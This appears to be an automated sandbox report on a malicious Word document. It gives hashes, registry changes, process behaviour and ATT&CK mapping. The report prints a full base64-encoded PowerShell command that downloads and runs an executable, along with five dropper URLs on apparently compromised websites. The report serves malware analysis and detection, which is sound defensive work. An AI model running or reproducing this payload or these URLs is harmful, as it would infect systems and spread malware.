8527a735f27cf13a51f7a82055318dd78d9bb45564b8f653812fca32a84f79e1

General

Target

63f2aabe4d5b63d99e8fa956f47cd497_JaffaCakes118.doc
Size

235KB
MD5

63f2aabe4d5b63d99e8fa956f47cd497
SHA1

2d53c4209c25bf3c31572e35e2abd194342fe752
SHA256

8527a735f27cf13a51f7a82055318dd78d9bb45564b8f653812fca32a84f79e1
SHA512

63ed9363b3afe016203675fbf32504b3b803e19ec03ce3ab43c25897168f539952727b2f4f8bc808cd5302e76b5e104e4c5f7f515b053b1485083c1a83f605e7
SSDEEP

3072:XOa3bgBAeOY5CTsdATUObYJ0m9zGAkbtO2lY2Go//6rGHsrw9sSJ6wKlutfMV:XOa3bgBrbb0dRx//MGHsrksSJ69q

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://thijsmorlion.com/wp-admin/h52077/

exe.dropper

http://thegioigas.com/Login/1g98/

exe.dropper

http://yy6262.com/wordpress/h670/

exe.dropper

http://thenews4views.com/9mcmnp3/2i36/

exe.dropper

http://queeniekawabe.com/all_photos/4el75/

Signatures

Blocklisted process makes network request 6 IoCs

Processes:

powershell.exe

flow pid process

3 2240 powershell.exe
5 2240 powershell.exe
9 2240 powershell.exe
11 2240 powershell.exe
12 2240 powershell.exe
14 2240 powershell.exe

flow	pid	process
3	2240	powershell.exe
5	2240	powershell.exe
9	2240	powershell.exe
11	2240	powershell.exe
12	2240	powershell.exe
14	2240	powershell.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Office loads VBA resources, possible macro or embedded object present

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXE

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE

Modifies registry class 64 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\TypeLib\{11DE5A17-69DE-4B8C-A26F-9C307B4A74F9}\2.0\0\win32	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{11DE5A17-69DE-4B8C-A26F-9C307B4A74F9}\2.0\HELPDIR	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\TypeLib\{11DE5A17-69DE-4B8C-A26F-9C307B4A74F9}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\TypeLib	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

2444 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

2240 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2240 powershell.exe
Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

WINWORD.EXE

pid process

2444 WINWORD.EXE
2444 WINWORD.EXE
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

WINWORD.EXE

pid process

2444 WINWORD.EXE
2444 WINWORD.EXE

pid	process
2444	WINWORD.EXE

pid	process
2240	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2240	powershell.exe

pid	process
2444	WINWORD.EXE
2444	WINWORD.EXE

pid	process
2444	WINWORD.EXE
2444	WINWORD.EXE

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

WINWORD.EXE

description	pid	process	target process
PID 2444 wrote to memory of 2936	2444	WINWORD.EXE	splwow64.exe
PID 2444 wrote to memory of 2936	2444	WINWORD.EXE	splwow64.exe
PID 2444 wrote to memory of 2936	2444	WINWORD.EXE	splwow64.exe
PID 2444 wrote to memory of 2936	2444	WINWORD.EXE	splwow64.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\63f2aabe4d5b63d99e8fa956f47cd497_JaffaCakes118.doc"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2444
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:2936

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiADQAMABiADQAOQA4ADAANwA4ADAAMwAwAD0AJwB4ADcAMwBiADUAMwA1ADIAMAA0ADYAMQAnADsAJABjAGMAYgAzAHgAMgAxADYANwBiADYAMQAgAD0AIAAnADUAMwA5ACcAOwAkAHgANwA4ADAAMwB4AHgANAAxADgAMAAwAD0AJwBiADgAMwAwADAANAA1AGMAYwAwADUAYwAnADsAJABjADcANgAwADAAOQAwADQAMAA1ADcAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAGMAYwBiADMAeAAyADEANgA3AGIANgAxACsAJwAuAGUAeABlACcAOwAkAGMAMAA2AGIANQB4ADgAMQA5ADAAeAA2AGMAPQAnAGIANQA0ADAAMAA0ADAAMQAyADcAMAAnADsAJABiADQAMgAwADMAMAA2ADYAOAAxADUAPQAmACgAJwBuAGUAdwAnACsAJwAtAG8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAE4AZQB0AC4AdwBFAGIAYwBMAGkAZQBuAHQAOwAkAGMAMgAwADEANgAxAGMAOAA3ADEAMQA2AD0AJwBoAHQAdABwADoALwAvAHQAaABpAGoAcwBtAG8AcgBsAGkAbwBuAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBoADUAMgAwADcANwAvACoAaAB0AHQAcAA6AC8ALwB0AGgAZQBnAGkAbwBpAGcAYQBzAC4AYwBvAG0ALwBMAG8AZwBpAG4ALwAxAGcAOQA4AC8AKgBoAHQAdABwADoALwAvAHkAeQA2ADIANgAyAC4AYwBvAG0ALwB3AG8AcgBkAHAAcgBlAHMAcwAvAGgANgA3ADAALwAqAGgAdAB0AHAAOgAvAC8AdABoAGUAbgBlAHcAcwA0AHYAaQBlAHcAcwAuAGMAbwBtAC8AOQBtAGMAbQBuAHAAMwAvADIAaQAzADYALwAqAGgAdAB0AHAAOgAvAC8AcQB1AGUAZQBuAGkAZQBrAGEAdwBhAGIAZQAuAGMAbwBtAC8AYQBsAGwAXwBwAGgAbwB0AG8AcwAvADQAZQBsADcANQAvACcALgAiAHMAcABsAGAASQB0ACIAKAAnACoAJwApADsAJABiADAANQBjADAAYwA5ADMAYwAwADUANwAwAD0AJwBiADAANAAxADEAeAA5ADMAYgAxADEANQAwACcAOwBmAG8AcgBlAGEAYwBoACgAJAB4AHgAeABiADAANABiAGIAOAAzADMANQAwACAAaQBuACAAJABjADIAMAAxADYAMQBjADgANwAxADEANgApAHsAdAByAHkAewAkAGIANAAyADAAMwAwADYANgA4ADEANQAuACIAZABgAG8AVwBOAEwAbwBgAEEARABGAGAASQBsAEUAIgAoACQAeAB4AHgAYgAwADQAYgBiADgAMwAzADUAMAAsACAAJABjADcANgAwADAAOQAwADQAMAA1ADcAKQA7ACQAYgA3ADAAMAAwADAANQAwADgAeAA1AD0AJwBiADAAMwBjAHgAMAAwADQAMQA4ADAAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAnACsAJwAtAEkAdABlAG0AJwApACAAJABjADcANgAwADAAOQAwADQAMAA1ADcAKQAuACIATABFAE4AYABHAHQAaAAiACAALQBnAGUAIAAzADUAOAA2ADAAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwBUAGAAQQByAHQAIgAoACQAYwA3ADYAMAAwADkAMAA0ADAANQA3ACkAOwAkAGIAMAA5ADgAMAAwADAANAAwADcAMAA3AD0AJwB4ADAAYwAwADIANQAwADEAMABiADUAYgA5ACcAOwBiAHIAZQBhAGsAOwAkAGMAYwB4AHgANABiADAAMAA0ADgAeAA9ACcAYwA5ADEANAA5AHgAMwA1ADUAeAA2ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHgAeAA3AGMAOQB4AGMAYgAwADQAMAA2ADgAPQAnAGMAOQBiADEAYgA2ADEAMQAwAHgANAAnAA==
1⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2240

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\550414B.wmf

Filesize
444B

MD5
0a0fe801675692fc4fa9d98ec8f6047f

SHA1
1ff0dd04cb929f95d8b7cb063edd8215fbc3907b

SHA256
bbbcf48bd1ddb5c594ad8d7dbfde7c57b740af721c382aa450b18e98386dd495

SHA512
8977d64a01a1bf1a02e6aff7cbdd1c3ef9566995aa85ec888470d3d4f1800545f03e62b78a080bb5141aa1b22c0db80525b37b5ec7b998fb193a67fcbb344a34

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5EF37491.wmf

Filesize
444B

MD5
504605ff32300b60a8313d27db6b3b65

SHA1
b0c9058b79da594378db9487d215f8aa0ca57b8c

SHA256
9f7424cef12be438cbc0027223289db7bb800a760eb706b437b387f25496ef83

SHA512
02ae07da00e3ea30126a95f7a60daf998605ce69000513f07cb4a0e5851c883c599db6c2e66b0b50a0470c7082e8e8d3de6ba1f89717bbaeb4e8774b1e12e09e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6E37AA6D.wmf

Filesize
444B

MD5
2126dbcb7af0a7cb3f0e8275435fabfb

SHA1
5ee59d775c65e34f4c470c244b7c2d250122527a

SHA256
92923d678789582fe02eebeafaad98556a79c60922ed811fe58847f17f254c1a

SHA512
ccdb4882a58b3080f937145e77c777a1a79ae95f007b6fc66cc71f97863b3032ee4d2ea61d6ac7831137c609597e7ba66bdf6a5906a410a2631ec4b3ba967bae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AD2FB275.wmf

Filesize
444B

MD5
e4b51454568005db70924d00d1221781

SHA1
01ff68773962b3c358c506ef65e609a68dfee09d

SHA256
bae61ea1ad10fbb143f0748c29544a506505e1cb42cc5015983c08ab38a15ddd

SHA512
dd678f511fc0d6f551a241987fe5022735f7a8ddc50a3592a2fce100b2dfb3565ddd6f6aa902216617fcb9dca7a48aee7cb684a5163039d713e80f6eceb08238

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B36D75C7.wmf

Filesize
444B

MD5
04a0318a1f87ba1d41d7321d61389043

SHA1
4703c23487aabc3b63d341e2513898eb62b1f5c2

SHA256
0ec88ff0c855440fb39462247fc4a97974c3a9e2cbc619c24f42493d8c7512ab

SHA512
7e5e4925f0394b827b78e2e73eca3790c45d10936a57178c4080ca043df1e40d750b1e80ca19f4e291ffe4e8a1c0282ca7201ae7f81fa4f8f42393227abd5aa7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D6F01403.wmf

Filesize
444B

MD5
2a2b4855ac6fbae0a65e3363474b2844

SHA1
20494204361daa3c79188d9c46afcb053a335ff8

SHA256
e78d6d959f13d85eef62db74bda521e89b3160d0f3293b47c58f691e854c2a7f

SHA512
6db0cea9817d3ab44daf9d1369287a8f4c53473644ffe3fcde2e07d4cac9c7412e72eb48f5f1ea527e2c0744f6ba9a907f93aeb03b064d69fe177436c991bee1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
20KB

MD5
515d994a5f53e34c6caea5356bd87385

SHA1
4b980d8263d680683b1d64e1f734b7e61fb804b2

SHA256
